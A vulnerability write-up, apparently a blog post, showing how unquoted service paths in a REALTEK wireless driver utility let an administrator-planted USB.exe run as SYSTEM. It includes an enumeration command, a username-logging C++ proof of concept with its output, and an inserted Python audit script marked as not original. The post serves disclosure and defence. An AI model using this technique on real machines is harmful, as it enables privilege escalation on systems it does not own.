Exploiting Unquoted Service Paths For Fun and No Profit

exploitation cve windows

This kind of vulnerability is really old. However, vendors still fail to properly address this issue. This is just another example of exploiting this kind of vulnerability on Windows 10 with the most up-to-date ALFA AWUS036AC driver utility (version 1030.6). Note that the download link points to alfa.com but the driver utility itself says it’s developed by REALTEK.

The vulnerability

Upon installing the driver utility, two vulnerable services get installed. This can be checked using the following command:

C:\Users\ps>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Realtek DHCP Service | RTLDHCPService | C:\Program Files (x86)\REALTEK\USB Wireless LAN Utility\RTLDHCP.exe

RealtekWlanU         | RealtekWlanU   | C:\Program Files (x86)\REALTEK\USB Wireless LAN Utility\RtlService.exe

This means that the service paths of both services, Realtek DHCP Service and RealtekWlanU, contain spaces and are not enclosed in double quotes. Therefore, they are vulnerable to this kind of attack.

A quick C++ PoC that logs the username of the user that executes a certain .exe file looks like this:

#include <windows.h>
#include <lmcons.h>   // UNLEN
#include <fstream>

int main() {
    // Query the account the process runs under (ANSI variant to match the char buffer)
    char username[UNLEN + 1];
    DWORD username_len = UNLEN + 1;
    GetUserNameA(username, &username_len);

    // Append the account name to a world-readable log file
    std::ofstream outfile;
    outfile.open("C:\\Users\\Public\\userlog.txt", std::ios_base::app);
    outfile << username << std::endl;
    return 0;
}

When executed as a regular user, the binary logs ps, the name of the regular user account.

The Exploit

Both service paths share the common prefix C:\Program Files (x86)\REALTEK\USB Wireless LAN Utility. Note that the substring USB Wireless LAN Utility contains spaces, which is the part that makes the path exploitable. Exploiting this works by placing a malicious file called USB.exe into C:\Program Files (x86)\REALTEK, making the full path C:\Program Files (x86)\REALTEK\USB.exe. Please note that in this case this can only be performed by administrators. So this gives you a privilege escalation from Administrator to SYSTEM ¯\_(ツ)_/¯. The binary supplied by an attacker is executed as SYSTEM when the system is restarted. This can be seen for both vulnerable services in the log file:

SYSTEM
SYSTEM
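As an added example (not part of the original post), the following Python script applies the same filter as the wmic pipeline above and lists, for each unquoted auto-start service path, the intermediate executables Windows would try before reaching the real one; these are the locations an administrator should verify are not writable by standard users. The service list is constructed from the two REALTEK entries shown above in the post's `Name | PathName | StartMode` rendering; QuotedSvc, WinSvc and ManualSvc are made-up entries for contrast.

```python
from typing import Dict, List

# Constructed sample in the pipe-separated form used above; not a real capture.
SERVICES = r"""
RTLDHCPService | C:\Program Files (x86)\REALTEK\USB Wireless LAN Utility\RTLDHCP.exe | Auto
RealtekWlanU | C:\Program Files (x86)\REALTEK\USB Wireless LAN Utility\RtlService.exe | Auto
QuotedSvc | "C:\Program Files\Example Vendor\svc.exe" -run | Auto
WinSvc | C:\Windows\System32\svchost.exe -k netsvcs | Auto
ManualSvc | C:\Program Files\Other Vendor\tool.exe | Manual
"""


def unquoted_search_candidates(image_path: str) -> List[str]:
    """Executables Windows tries, in order, for an unquoted ImagePath with
    spaces: the command line is cut at each space and ".exe" appended until
    something runs (CreateProcess semantics). The last entry is the intended
    binary; every earlier one is a hijack point. A quoted path yields [],
    a path without spaces yields only itself."""
    if image_path.startswith('"'):
        return []
    tokens = image_path.split(" ")
    candidates: List[str] = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)  # reached the real binary; stop here
            break
        candidates.append(prefix + ".exe")
    return candidates


def audit(services_text: str) -> Dict[str, List[str]]:
    """Apply the wmic filter from above (auto-start, outside C:\\Windows\\,
    unquoted) and map each affected service to the paths that must not be
    creatable by standard users."""
    findings: Dict[str, List[str]] = {}
    for line in services_text.strip().splitlines():
        name, path, mode = (f.strip() for f in line.split(" | "))
        if mode.lower() != "auto" or "c:\\windows\\" in path.lower():
            continue
        candidates = unquoted_search_candidates(path)
        if len(candidates) > 1:
            findings[name] = candidates[:-1]
    return findings


if __name__ == "__main__":
    for svc, paths in audit(SERVICES).items():
        print(f"{svc}: verify standard users cannot create any of:")
        for p in paths:
            print("   ", p)
```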

The cause

The string that specifies the service path needs to be quoted to prevent this, as seen in this example.

Additional note

While quickly testing this for multiple driver utilities by REALTEK, all tested packages seemed to be “vulnerable”.

Credits
